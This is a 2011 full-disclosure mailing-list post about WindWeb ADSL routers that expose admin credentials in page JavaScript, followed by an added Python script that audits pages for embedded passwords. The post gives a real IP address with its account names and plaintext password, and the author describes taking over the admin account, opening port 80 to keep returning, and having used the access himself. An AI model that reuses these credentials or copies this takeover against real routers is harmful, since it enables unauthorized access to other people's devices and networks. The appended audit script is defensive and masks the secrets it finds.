Date: Tue, 13 Sep 2011 06:21:28 +1000
From: xD 0x41 <secn3t@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: WindWeb HTTPD add admin / html page insertion

Hello!
    just a quick one on a webserver used primarily and mainly in Korea.
WindWeb server / router.
This is an ADSL router which handles 4meg/s and these routers are all the
same, can overwrite the admin just like this..

demo/poc:
OK, let's find a WindWeb... here I have simply dumped sniffed traffic... easy
as! Scanning takes time :P

220.76.166.73:80: - "501 Not Implemented  Server: WindWeb/2.0  Connection:
close  Content-Type: text/html    Web Server Error Report:<HR> <H1>Server
Error: 501 Not Implemented</H1>  Operating System Error Nr:3997697: errno =
0x3d0001 <P><HR><H2>No RPM for this combination of URL and
method</H2><P><P><HR><H1>/doc/flowctrl.htm</H1><P>"

OK, let's look and oops, this ain't good, admin pass is changeable in HTML..
also let's make sure we open port 80 and allow myself back in.

<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
 id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

220.76.166.73  U:adsl P:Megapass

Now I can access port 80 and open it so I get back inside when I like...

This was just too easy... c'mon ISPs, lift your game... plaintext and, albeit
this is old now but I have been busy using it you see.. anyhow, have a happy
route.
xd
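
As an added example (not part of the original post), a small Python audit check for the pattern shown above: a device page that embeds account and password arrays in client-side JavaScript. It parses the `var name = new Array(); name[i]="..."` form and reports only masked findings (counts and reuse), so it can be pointed at your own router's pages without copying the secrets anywhere. The sample page is constructed from the fragment above, and the variable-name lists are assumptions.

```python
import re

# Constructed sample modelled on the page fragment above (not captured traffic).
SAMPLE_PAGE = '''<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
st_lan_ip[0] = "192.168.1.1"
<!--
var id = new Array();
 id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"
'''

# Assumed variable names that denote secrets / accounts in such pages.
SECRET_NAMES = {"pass", "passwd", "password", "pwd"}
ACCOUNT_NAMES = {"id", "user", "username", "login"}

ARRAY_DECL = re.compile(r'var\s+(\w+)\s*=\s*new\s+Array\s*\(')
ARRAY_ELEM = re.compile(r'^\s*(\w+)\[(\d+)\]\s*=\s*"([^"]*)"', re.M)


def js_arrays(body):
    """Collect JavaScript string arrays that are filled element by element."""
    arrays = {name: {} for name in ARRAY_DECL.findall(body)}
    for name, idx, value in ARRAY_ELEM.findall(body):
        if name in arrays:
            arrays[name][int(idx)] = value
    return arrays


def audit_page(body):
    """Return findings for a page that should not expose credentials.
    Secret values are never returned, only masked descriptions."""
    findings = []
    for name, elems in js_arrays(body).items():
        lname = name.lower()
        if lname in SECRET_NAMES and elems:
            findings.append(f"{name}[]: {len(elems)} password value(s) embedded in page (masked)")
            if len(elems) > 1 and len(set(elems.values())) < len(elems):
                findings.append(f"{name}[]: same password reused across {len(elems)} accounts")
        elif lname in ACCOUNT_NAMES and elems:
            findings.append(f"{name}[]: {len(elems)} account name(s) embedded in page")
    return findings


if __name__ == "__main__":
    for line in audit_page(SAMPLE_PAGE):
        print(line)
```

Any non-empty result means the page hands out credentials to whoever can reach port 80, which is the condition to fix (authenticate the page, or better, never send secrets to the client).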

